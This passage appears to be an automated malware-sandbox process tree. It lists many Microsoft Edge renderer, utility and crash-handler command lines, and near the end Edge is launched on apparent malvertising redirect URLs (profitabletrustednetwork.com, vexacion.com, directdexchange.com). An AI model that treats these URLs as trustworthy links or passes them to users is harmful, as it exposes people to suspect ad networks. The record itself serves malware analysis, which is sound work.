"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4440 /prefetch:1
14⤵
PID:6604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:1
14⤵
PID:5960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3108 /prefetch:1
14⤵
PID:10132

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1944 /prefetch:1
14⤵
PID:8360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1240 /prefetch:1
14⤵
PID:10104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1
14⤵
PID:5656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:1
14⤵
PID:1904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:1
14⤵
PID:9532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
14⤵
PID:8260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
14⤵
PID:5676

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
14⤵
PID:5836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
14⤵
PID:2168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1232 /prefetch:1
14⤵
PID:7820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4276 /prefetch:1
14⤵
PID:10060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4240 /prefetch:1
14⤵
PID:7268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6124 /prefetch:8
14⤵
PID:8524

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
14⤵
PID:6916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2300 /prefetch:1
14⤵
PID:7948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
14⤵
PID:10056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4320 /prefetch:1
14⤵
PID:8136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
14⤵
PID:6008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4268 /prefetch:1
14⤵
PID:8624

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:1
14⤵
PID:10164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:1
14⤵
PID:3480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6748 /prefetch:1
14⤵
PID:1192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4080 /prefetch:1
14⤵
PID:4656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1
14⤵
PID:7256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:1
14⤵
PID:804

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3988 /prefetch:1
14⤵
PID:2976

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1
14⤵
PID:1332

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6596 /prefetch:1
14⤵
PID:6076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4320 /prefetch:1
14⤵
PID:2932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:1
14⤵
PID:1568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6616 /prefetch:8
14⤵
PID:9480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6844 /prefetch:1
14⤵
PID:6788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:1
14⤵
PID:8272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
14⤵
PID:8600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4428 /prefetch:1
14⤵
PID:6896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
14⤵
PID:8312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
14⤵
PID:6900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6252 /prefetch:1
14⤵
PID:10020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1680 /prefetch:1
14⤵
PID:7868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
14⤵
PID:7760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:1
14⤵
PID:852

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:1
14⤵
PID:9156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:1
14⤵
PID:8472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:1
14⤵
PID:8572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:1
14⤵
PID:8868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
14⤵
PID:8664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1
14⤵
PID:804

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7052 /prefetch:1
14⤵
PID:936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7284 /prefetch:1
14⤵
PID:7560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
14⤵
PID:9272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
14⤵
PID:9432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
14⤵
PID:9988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5752 /prefetch:8
14⤵
PID:240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
14⤵
PID:6068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2976 /prefetch:1
14⤵
PID:7012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6508 /prefetch:1
14⤵
PID:6876

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
14⤵
PID:10216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
13⤵
PID:7704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f74718
14⤵
PID:5036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
13⤵
PID:8940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f74718
14⤵
PID:8960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
13⤵
PID:6448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f74718
14⤵
PID:8952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
13⤵
PID:7584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
